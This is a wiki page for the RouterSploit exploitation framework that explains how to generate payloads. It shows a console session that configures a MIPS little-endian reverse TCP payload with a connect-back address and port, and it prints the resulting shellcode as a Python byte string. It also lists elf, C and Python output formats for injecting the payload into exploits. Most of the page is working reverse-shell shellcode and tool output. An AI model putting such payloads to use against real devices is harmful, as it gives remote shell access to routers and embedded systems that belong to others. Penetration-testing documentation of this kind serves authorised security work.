Skip to content

Generating Payloads

Marcin Bury edited this page Oct 13, 2018 · 7 revisions

Generating Payloads

Example Payload Generation

rsf > use payloads/mipsle/reverse_tcp
rsf (MIPSLE Reverse TCP) > show options

Target options:

   Name      Current settings     Description
   ----      ----------------     -----------
   lhost                          Connect-back IP address
   lport     5555                 Connect-back TCP Port


Module options:

   Name         Current settings     Description
   ----         ----------------     -----------
   encoder                           Encoder
   output       python               Output type: elf/c/python
   filepath     /tmp/Pf8CV10g        Output file to write


rsf (MIPSLE Reverse TCP) > set lhost 192.168.1.99
[+] lhost => 192.168.1.99
rsf (MIPSLE Reverse TCP) > set lport 4343
[+] lport => 4343
rsf (MIPSLE Reverse TCP) > run
[*] Running module...
[*] Generating payload
[+] Building payload for python
payload = (
    "\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04"
    "\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20"
    "\x80\x01\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27"
    "\x20\x80\x01\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24"
    "\x0c\x09\x09\x01\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09"
    "\x01\xc9\x0f\x02\x24\x0c\x09\x09\x01\x10\xf7\x05\x3c\x02\x00"
    "\xa5\x34\xf8\xff\xa5\xaf\x01\x63\x05\x3c\xc0\xa8\xa5\x34\xfc"
    "\xff\xa5\xaf\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01"
    "\x4a\x10\x02\x24\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08"
    "\x35\xec\xff\xa8\xaf\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff"
    "\xa8\xaf\xff\xff\x07\x28\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec"
    "\xff\xa4\x23\xec\xff\xa8\x23\xf8\xff\xa8\xaf\xf8\xff\xa5\x23"
    "\xec\xff\xbd\x27\xff\xff\x06\x28\xab\x0f\x02\x24\x0c\x09\x09"
    "\x01"
)

Payload Generation

Payloads can be generated into following formats:

  • elf - elf binary that can be executed on the target system (CPU architecture has to match)
  • c - payload that can be used as a part of C exploit and injected directly into memory
  • python - payload that can be used as a part of python exploit and injected directly into memory
Clone this wiki locally